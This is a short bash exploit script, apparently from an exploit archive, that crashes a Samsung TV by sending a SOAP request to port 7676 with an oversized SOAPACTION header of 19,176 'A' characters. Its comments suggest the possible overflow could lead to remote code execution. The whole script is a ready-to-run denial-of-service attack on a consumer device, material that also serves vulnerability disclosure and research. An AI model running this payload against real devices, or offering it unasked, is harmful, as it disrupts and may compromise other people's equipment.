#!/bin/bash ##################################################### # Samsung TV DoS (possible overflow) via SOAPACTION # ##################################################### # # Authors: # # 22733db72ab3ed94b5f8a1ffcde850251fe6f466 # c8e74ebd8392fda4788179f9a02bb49337638e7b # AKAT-1 # ####################################### # Verified for ue55es6800. Nope, it's different than http://www.exploit-db.com/exploits/18751/. # (have_telnet) ? RCE : "vuln is DoS if not clever enough to exploit" - Spender. TARGET=$1 if [ -z $TARGET ]; then echo $0 "target_ip" exit fi P=`perl -e 'print "A"x19176'` curl -vvv -o - -d "none" -H "Content-Type: text/xml; charset=\"utf-8\"" -H "SOAPACTION: \"urn:schemas-upnp-org:service:AVTransport:1#SetAVTransport$P\"" http://$TARGET:7676/smp_22_ # EOF